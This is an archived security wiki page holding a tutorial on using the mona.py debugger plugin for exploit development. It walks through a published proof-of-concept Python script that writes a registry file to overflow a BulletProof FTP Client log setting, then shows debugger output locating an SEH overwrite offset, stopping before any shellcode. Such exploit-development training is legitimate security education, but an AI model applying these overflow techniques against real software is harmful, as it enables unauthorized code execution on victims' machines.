Test

From Security Weekly Wiki
Revision as of 21:20, 17 October 2013 by Rkornmeyer (talk | contribs)
Jump to navigationJump to search
EmbedVideo does not recognize the video service "bliptv".


PaulDotCom iTunes PaulDotCom on YouTube PaulDotCom Blog PaulDotCom Facebook Fan Page Follow Us On Twitter LinkedIN Blip.TV Google+


Getting Dirty With Mona : SEH Overwrite

Despite the title, this isn't something that will legally requite opt-in if you are in the UK. This is a quick tutorial about corelan's mona.py. This tool makes me very excited, even though its been around for a while… I've just found it! And as far as I can tell, no one here has posted anything about it. So… Im going to walk through some basic exploit development with mona.py on Immunity Debugger with the following exploit POC : POC

First, we need to go to corelan to download mona and follow the setup. Which, is honestly a drag and drop operation with a few commands to get mona to output log files correctly (without overwriting)

Now, pretty much every class I've taken on exploit development has relied on metasploit to generate and find memory offsets in the stack, registers & EIP. Mona makes this process simple… Lets take a look:


We tell mona to make us a pattern for the POC, in this case 552 bytes long


!mona pc 552


<script>Mona tells us :

====================================================================
 Output generated by mona.py v2.0, rev 447 - Immunity Debugger
 Corelan Team - https://www.corelan.be
====================================================================
 OS : xp, release 5.1.2600
 Process being debugged : _no_name (pid 0)
====================================================================
 2013-10-17 16:25:27
====================================================================

Pattern of 552 bytes :


Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3 </script>

We take that pattern, completely unique in structure, and inject it into our POC like so:


  1. !/usr/bin/python
  1. Exploit Title: BulletProof FTP Client v2010.75.0.76 Local Buffer Overflow
  2. Version: 2010.75.0.76
  3. Date: 2012-03-11
  4. Author: Julien Ahrens
  5. Homepage: http://www.inshell.net
  6. Software Link: http://www.bpftp.com/
  7. Tested on: Windows XP SP3 Professional German
  8. Notes: -
  9. Howto: Import Reg -> Start App

file="poc.reg"

junk1="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3"

  1. boom="\x42\x42\x42\x42"
  2. junk2="\x43" * 100

poc="Windows Registry Editor Version 5.00\n\n" poc=poc + "[HKEY_CURRENT_USER\Software\BulletProof Software\BulletProof FTP Client 2010\Options]\n" poc=poc + "\"LogFileName\"=\"" + junk1 + "\""

try:

   print "[*] Creating exploit file...\n";
   writeFile = open (file, "w")
   writeFile.write( poc )
   writeFile.close()
   print "[*] File successfully created!";

except:

   print "[!] Error while creating file!";


We execute our code, in this case the python file will create a file.reg, the POC tells us why we need to put this in our registry. We then go and open our Bulletproof FTP client.

Look at that! Our pattern is show at EAX and ESB…. great…. so how does that help us?

Im not sure, if i were looking at it normally, i would be looking for EIP… however, there are many ways to get our own code to execute…. lets ask Mona!

We type in :

!Mona findmsp

We get the following results:

[+] Looking for cyclic pattern in memory

   Cyclic pattern (normal) found at 0x0012fa40 (length 552 bytes)
   -  Stack pivot between 172 & 724 bytes needed to land in this pattern
   Cyclic pattern (normal) found at 0x016657d8 (length 552 bytes)
   EAX overwritten with normal pattern : 0x41366e41 (offset 408)
   EBP (0x0012fbf4) points at offset 436 in normal pattern (length 116)

[+] Examining SEH chain

   SEH record (nseh field) at 0x0012fbfc overwritten with normal pattern : 0x7041396f (offset 444), followed by 104 bytes of cyclic data

[+] Examining stack (entire stack) - looking for cyclic pattern

   Walking stack from 0x00128000 to 0x0012fffc (0x00007ffc bytes)
   0x0012fa40 : Contains normal cyclic pattern at ESP+0xac (+172) : offset 0, length 552 (-> 0x0012fc67 : ESP+0x2d4)

[+] Examining stack (entire stack) - looking for pointers to cyclic pattern

   Walking stack from 0x00128000 to 0x0012fffc (0x00007ffc bytes)
   0x0012da1c : Pointer into normal cyclic pattern at ESP-0x1f78 (-8056) : 0x0012fa68 : offset 40, length 512
   0x0012eb3c : Pointer into normal cyclic pattern at ESP-0xe58 (-3672) : 0x0012fc24 : offset 484, length 68
   0x0012eba4 : Pointer into normal cyclic pattern at ESP-0xdf0 (-3568) : 0x0012fc24 : offset 484, length 68
   0x0012ebbc : Pointer into normal cyclic pattern at ESP-0xdd8 (-3544) : 0x0012fc24 : offset 484, length 68
   0x0012f948 : Pointer into normal cyclic pattern at ESP-0x4c (-76) : 0x0012fa40 : offset 0, length 552
   0x0012f954 : Pointer into normal cyclic pattern at ESP-0x40 (-64) : 0x0012fa40 : offset 0, length 552
   0x0012f958 : Pointer into normal cyclic pattern at ESP-0x3c (-60) : 0x0012fbf4 : offset 436, length 116
   0x0012f960 : Pointer into normal cyclic pattern at ESP-0x34 (-52) : 0x0012fa40 : offset 0, length 552
   0x0012f99c : Pointer into normal cyclic pattern at ESP+0x8 (+8) : 0x0012fbf4 : offset 436, length 116
   0x0012f9a0 : Pointer into normal cyclic pattern at ESP+0xc (+12) : 0x0012fbfc : offset 444, length 108
   0x0012f9a8 : Pointer into normal cyclic pattern at ESP+0x14 (+20) : 0x0012fbf4 : offset 436, length 116
   0x0012fa0c : Pointer into normal cyclic pattern at ESP+0x78 (+120) : 0x0012fb44 : offset 260, length 292
   0x0012fcf8 : Pointer into normal cyclic pattern at ESP+0x364 (+868) : 0x016657d8 : offset 0, length 552


Wow, it took Mona a couple seconds to do that…. It might of taken me a while to figure all that out.

In this particular instance, the following is interesting :


[+] Examining SEH chain

   SEH record (nseh field) at 0x0012fbfc overwritten with normal pattern : 0x7041396f (offset 444), followed by 104 bytes of cyclic data


Lets go look at that in the stack:



Alright, so this is an SEH overwrite exploit, so lets ask mona what to do:


!mona SEH


Our list of Pop Pop Ret:


amazing stuff!!!

Stay turned for some more exploit fun!!!